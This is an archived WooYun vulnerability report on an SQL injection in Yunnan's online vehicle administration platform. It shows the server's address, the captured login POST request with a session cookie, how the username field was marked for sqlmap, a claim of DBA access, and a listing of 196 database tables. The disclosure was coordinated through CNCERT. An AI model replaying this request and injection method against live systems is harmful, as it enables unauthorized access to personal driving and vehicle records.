当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081411

漏洞标题:云南省网上车管服务平台 SQL注入

相关厂商:云南省网上车管服务平台

漏洞作者: 路人甲

提交时间:2014-10-31 12:42

修复时间:2014-12-15 12:44

公开时间:2014-12-15 12:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-31: 细节已通知厂商并且等待厂商处理中
2014-11-05: 厂商已经确认,细节仅向厂商公开
2014-11-15: 细节向核心白帽子及相关领域专家公开
2014-11-25: 细节向普通白帽子公开
2014-12-05: 细节向实习白帽子公开
2014-12-15: 细节向公众公开

简要描述:

详细说明:

注入地址:http://220.163.43.25/vwss/desktop/wssextdesktop.jsp
登入界面

1.jpg


登入后Burp抓包
post请求

POST /vwss/RVSServlet HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://220.163.43.25/vwss/desktop/wssextdesktop.jsp
Accept: text/javascript, text/html, application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 220.163.43.25
Content-Length: 209
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=4EFE369A03A29FEEEDD29FA482ABA858-n1; CNZZDATA3933438=cnzz_eid%3D386273344-1414585947-http%253A%252F%252F220.163.43.25%252F%26ntime%3D1414585947
rvscmd=com.rivs.wssmem.security.UserLogin.orgLogin%252528%25255B%252522aaa%252522%25252C%252522aaa%252522%25252C%2525223CKV%25253BCDE1B0DF825C18181632AE399261162C31343134353836303037373635%252522%25255D%252529


post数据通过burp decoder中解码后得到

rvscmd=com.rivs.wssmem.security.UserLogin.orgLogin(["aaa","aaa","3CKV;CDE1B0DF825C18181632AE399261162C31343134353836303037373635"])


然后在登入名、密码处(这里为aaa, aaa)加上*

rvscmd=com.rivs.wssmem.security.UserLogin.orgLogin%252528%25255B%252522aaa*%252522%25252C%252522aaa*%252522%25252C%2525223CKV%25253BCDE1B0DF825C18181632AE399261162C31343134353836303037373635%252522%25255D%252529


丢到sqlmap中跑,用户处(第一个*)存在注入

2.jpg


dba权限

漏洞证明:

数据库

3.jpg


表:

Database: YNVEHWSS
[196 tables]
+--------------------------+
| CMS_DOCA                |
| PQ_BLOCKIPS             |
| RIVS_PKGSENDQ_HIS       |
| RVSWX_MSRV              |
| TC_CODE_TJYY            |
| TXP_ELEMENT_XPJBAK      |
| VEH_VEHICLE             |
| AF01                     |
| AF02                     |
| CG01                     |
| CG02                     |
| CG03                     |
| CG04                     |
| CG04D                    |
| CG05                     |
| CMS_CHN                  |
| CMS_CNT                  |
| CMS_CNT_BAK              |
| CMS_DOC_BAK              |
| DRIVINGLICENSE_HHZD      |
| DRV_DRIVINGLICENSE       |
| DRV_LEARNER_VEHICLE      |
| DRV_PRE_HH005TMP         |
| DRV_SCHOOLINFO           |
| DRV_VIOACD               |
| EB_REG_CATALOG           |
| EB_REG_OSN               |
| EC01                     |
| EP01                     |
| EP01_20140429            |
| EP01_HS                  |
| EP01_HSOK                |
| EP01_SW                  |
| EP01_TEMP                |
| EP01_XPJ3                |
| EP02                     |
| EP02B                    |
| EP03                     |
| EP04                     |
| EP05                     |
| EP06                     |
| EP10                     |
| EP12                     |
| EP13                     |
| EP20                     |
| EP21                     |
| FG01                     |
| FG01HIS                  |
| FM01                     |
| FM02                     |
| FM03                     |
| HHGZ_TMP                 |
| MS01                     |
| MS02                     |
| MS05                     |
| PB01                     |
| PB02                     |
| PB03                     |
| PB04                     |
| PB05                     |
| PB06                     |
| PB11                     |
| PC01                     |
| PC02                     |
| PQ_AD                    |
| PQ_BLOCKLOG              |
| PQ_CONTACT               |
| PQ_KEYD                  |
| PQ_KEYD_EXTADD           |
| PQ_KEYSYN                |
| PQ_KEYV                  |
| PQ_KEYV_EXTADD           |
| PQ_QLIST                 |
| PQ_QLISTVIO              |
| PQ_VERIFYLOG             |
| QA01                     |
| RIVS_ACLOG               |
| RIVS_ACLOG_HS            |
| RIVS_N2N                 |
| RIVS_PKGMSGBUFFER        |
| RIVS_PKGMSGBUFFER_HIS    |
| RIVS_PKGMSGBUFFER_HIS3   |
| RIVS_PKGRECEIVEQ         |
| RIVS_PKGRECEIVEQ_HIS     |
| RIVS_PKGRECEIVEQ_HIS3    |
| RIVS_PKGSENDQ            |
| RIVS_PKGSENDQ_HIS3       |
| RIVS_PKGTASKLOG          |
| RIVS_RPCBRIDGE           |
| RIVS_RPCBRIDGEBUF        |
| RIVS_RPCBRIDGE_BAK       |
| RIVS_SEQUENCE            |
| RIVS_SYSCHK              |
| RIVS_SYSCHKLOG           |
| RIVS_TASK                |
| RIVS_TASKPARAM           |
| RIVS_TASKRUNLOGS         |
| RIVS_TASKRUNS            |
| RVMSE_MLOG               |
| RVMSE_RQ                 |
| RVMSE_SQ                 |
| RVMSE_TMP                |
| RVMS_ADB                 |
| RVMS_ADEXT               |
| RVMS_ADGAD               |
| RVMS_ADTAGS              |
| RVMS_CNT                 |
| RVMS_D                   |
| RVMS_ERRORTEL            |
| RVMS_KEYWORD             |
| RVMS_MLOG                |
| RVMS_MSISENDBILL         |
| RVMS_MSRV                |
| RVMS_MSRVATTRIBUTE       |
| RVMS_SQEMAIL             |
| RVMS_SQHIS               |
| RVSWX_SP01               |
| RVSWX_SP01HIS            |
| RVSWX_SP02               |
| RVSWX_TPL                |
| SB01                     |
| SB02                     |
| SC01                     |
| SC10                     |
| SG01                     |
| SG01_XPJBAK              |
| SG02                     |
| SG02_BAK201404           |
| SG03                     |
| SG03E                    |
| SG03_XPJBAK              |
| SG04                     |
| SG06                     |
| SG07                     |
| SG08                     |
| SL01                     |
| SL02                     |
| SL03                     |
| SL05                     |
| SM01                     |
| SM02                     |
| SM03                     |
| SMS0451B                 |
| SP01                     |
| SP02                     |
| SP03                     |
| SP04                     |
| SP10                     |
| SP21                     |
| SP30                     |
| SS01                     |
| TC_CODE                  |
| TC_CODE5325              |
| TC_CODE_2013             |
| TC_CODE_BAK              |
| TC_CODE_BAK53            |
| TC_CODE_CX               |
| TC_CODE_CXJX             |
| TC_CODE_DBL              |
| TC_CODE_JLC5325          |
| TC_CODE_JLCA             |
| TC_CODE_KD               |
| TC_CODE_LC               |
| TC_CODE_LJ               |
| TC_CODE_PE               |
| TC_CODE_TEST             |
| TC_CODE_TJYY2            |
| TC_CODE_WS               |
| TC_CODE_XP201205         |
| TC_CODE_XPJ              |
| TC_DVCNT                 |
| TC_PRINTPARAM            |
| TC_WORKDAY               |
| TD_PRERECORD_EXPHH       |
| TD_PRERECORD_HS          |
| TD_PRERECORD_XPJCHK      |
| TD_PRERECORD_XPJCHK2     |
| TD_PREREAORD             |
| TS_YX_EP02               |
| TS_YX_EP03               |
| TS_YX_EP04               |
| TV_PRERECORD             |
| TV_REPMENT               |
| TXP_ELEMENT              |
| TXP_ELEMENTVLE_RV        |
| TXP_ELEMENTVLE_RV_XPJBAK |
| TXP_ENTITY               |
| TXP_ENTITYREC            |
| TXP_ENTITYREC_XPJBAK     |
| VEHICLE_HHZD             |
| VEHTYPE                  |
| VIO_CODEWFDM             |
| WM01                     |
| XPJTEST1                 |
| YYJC_VEH                 |
| YYJC_VEH_B               |
+--------------------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-11-05 08:20

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无